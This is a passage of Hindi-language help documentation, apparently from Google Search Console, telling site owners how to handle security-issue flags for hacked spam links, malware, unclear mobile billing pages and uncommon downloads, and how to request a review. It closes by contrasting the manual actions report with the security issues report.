अगर ये लिंक जानबूझकर शामिल किए गए हैं, तो इन्हें अपनी साइट से हटा दें और सीधे समीक्षा के लिए अनुरोध करें पर जाएं.

अगर आपको इन लिंक के बारे में जानकारी नहीं है, तो हो सकता है कि आपकी साइट हैक कर ली गई हो.

2. देखें कि क्या आप इस समस्या को ठीक कर सकते हैं

अगर आपकी साइट को हैक कर लिया गया है, तो स्पैम की समस्या को खुद ठीक करने की जानकारी पाने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

3. समस्या का पता लगाएं

 

असामान्य रूप से डाउनलोड होने वाली फ़ाइलों की पुष्टि करने के लिए, अपनी साइट के कुछ पेजों की अच्छी तरह जांच कर लें. कुछ मामलों में, अगर हैकर को पता चल जाता है कि आप साइट के मालिक हैं, तो वह ये लिंक छिपा सकता है. इसलिए, यूआरएल की जांच करने वाले टूल की मदद से नमूना यूआरएल पर जाएं या किसी दूसरे खाते या कंप्यूटर से लॉग इन करें.

4. अपनी साइट से मैलवेयर हटाएं

अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक की गई सामग्री को ठीक करने के लिए बनाई गई गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे सुरक्षित रखने के सुझाव बताए गए हैं. अपनी साइट से मैलवेयर हटाने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैक अप के तौर पर पहले सेव की गई बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाली सामग्री हटा सकते हैं.

5. समस्याओं को ठीक करने के बाद उनकी पुष्टि करें

ध्यान रखें कि आपकी साइट अनचाहे सॉफ़्टवेयर की नीति के मुताबिक सही हो.

6. समीक्षा का अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

मोबाइल पर खुलने वाले ऐसे पेज, जिनमें शुल्क की नीतियों के बारे में साफ़ तौर पर नहीं बताया जाता

अगर Google को पता चलता है कि आपकी साइट में मोबाइल पर खुलने वाले ऐसे पेज हैं जिनमें शुल्क की नीतियों के बारे में उपयोगकर्ताओं को पूरी जानकारी नहीं दी जाती, तो Chrome पर इसके बारे में चेतावनी दिखाई जा सकती है. यह चेतावनी शुल्क लेने वाले पेज के लोड होने से पहले दिखाई जाती है.

1. समस्या का पता लगाएं

यह जानने के लिए कि किन पेजों में इस शुल्क के बारे में अधूरी जानकारी दी गई है, रिपोर्ट में उदाहरण के तौर पर दिए गए यूआरएल देखें. यहां मोबाइल पर खुलने वाले पेज पर उपलब्ध शुल्क की नीतियों के बारे में दिशा-निर्देश पढ़ें.

2. समस्या ठीक करें

अपने पेजों की समस्या हल करें, ताकि उन पर दी जाने वाली शुल्क की जानकारी दिशा-निर्देशों के मुताबिक हो.

3. समीक्षा का अनुरोध करें

जब आप यह पुष्टि कर देते हैं कि आपकी साइट की समस्या को ठीक कर लिया गया है, तब सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

असामान्य रूप से डाउनलोड होने वाली फ़ाइलें

आपकी साइट पर ऐसी फ़ाइलें मिल सकती हैं जिनकी Google सुरक्षित ब्राउज़िंग से पहचान न हो पाए. ऐसे में Chrome ब्राउज़र यह चेतावनी दे सकता है कि ये फ़ाइलें असामान्य रूप से डाउनलोड हुई हैं और इनसे आपकी साइट को खतरा हो सकता है. अगर Google सुरक्षित ब्राउज़िंग से यह पुष्टि हो जाती है कि मौजूदा फ़ाइलें सुरक्षित हैं, तो ये चेतावनियां अपने-आप हटा दी जाएंगी. ध्यान दें कि इस समस्या के लिए, हमेशा उदाहरण के तौर पर यूआरएल नहीं दिए जाते.

यह समस्या आपके पेज या साइट को 'Google सर्च' के खोज नतीजों में दिखने से नहीं रोकेगी. हालांकि, जब उपयोगकर्ता अज्ञात फ़ाइलें डाउनलोड करने का अनुरोध करता है, तब यह Chrome ब्राउज़र में एक चेतावनी दिखाएगी.

1. समस्या ठीक करें

इस बात का पता लगाएं और पुष्टि करें कि आपकी डाउनलोड की गई फ़ाइलें, डाउनलोड करने के दिशा-निर्देशों के मुताबिक हैं या नहीं.

  • अगर आपकी साइट से डाउनलोड की गई कोई भी फ़ाइल इन दिशा-निर्देशों का उल्लंघन करती है, तो उसे हटा दें.
  • अगर डाउनलोड की जाने वाली किसी भी फ़ाइल से इन दिशा-निर्देशों का उल्लंघन नहीं होता है, तो आपको उसे हटाने की ज़रूरत नहीं है.

2. समीक्षा का अनुरोध करें

जब आप फ़ाइलें हटा लें (या यह पुष्टि करें कि आपकी डाउनलोड की गई फ़ाइलें दिशा-निर्देशों के मुताबिक सही हैं), तो सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा करने के लिए कहें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं. समीक्षा करने के अनुरोध के बिना भी, Google डाउनलोड की गई ज़्यादातर फ़ाइलों की जांच करता है और उन्हें 'स्वीकार की गई' या 'नुकसान पहुंचाने वाली' श्रेणी में रखता है. हालांकि, समीक्षा करने का अनुरोध करने से जांच करने की प्रक्रिया तेज़ हो जाती है.

 

मैन्युअल ऐक्शन की रिपोर्ट और सुरक्षा की समस्याओं वाली रिपोर्ट में क्या फ़र्क़ है?

मैन्युअल तरीके से की गईं कार्रवाइयों की रिपोर्ट किसी ऐसे पेज या साइट में समस्याओं की सूची बनाती है जो ज़्यादातर हमारे खोज के इंडेक्स में हेर-फ़ेर करने की कोशिश करती हैं, लेकिन उपयोगकर्ताओं के लिए खतरनाक हों ऐसा ज़रूरी नहीं है. यहां बताई गईं ज़्यादातर समस्याएं ऐसी हैं, जिनकी वजह से खोज नतीजों में पेज या साइट नीचे दिखने लगेंगे या उन्हें खोज नतीजों से हटा दिया जाएगा. उपयोगकर्ता को इसका कोई संकेत नहीं मिलेगा.

सुरक्षा समस्याओं की रिपोर्ट ऐसे संकेतों की सूची बनाती है जिससे पता लगे कि आपकी साइट हैक कर ली गई थी या आपकी साइट पर ऐसा व्यवहार था जो वेबसाइट पर आने वाले व्यक्ति या उनके कंप्यूटर को संभावित रूप से नुकसान पहुंचा सकता है. उदाहरण के लिए, फ़िशिंग आक्रमण या उपयोगकर्ता के कंप्यूटर पर मैलवेयर या अनचाहा सॉफ़्टवेयर इंस्टॉल करना. खोज नतीजों में इन पेजों के साथ चेतावनी का लेबल दिख सकता है या जब कोई उपयोगकर्ता इन पेजों पर जाने की कोशिश करेगा, तब पेज खुलने से पहले उसे ब्राउज़र पर चेतावनी वाला पेज दिख सकता है.

क्या यह उपयोगी था?
हम उसे किस तरह बेहतर बना सकते हैं?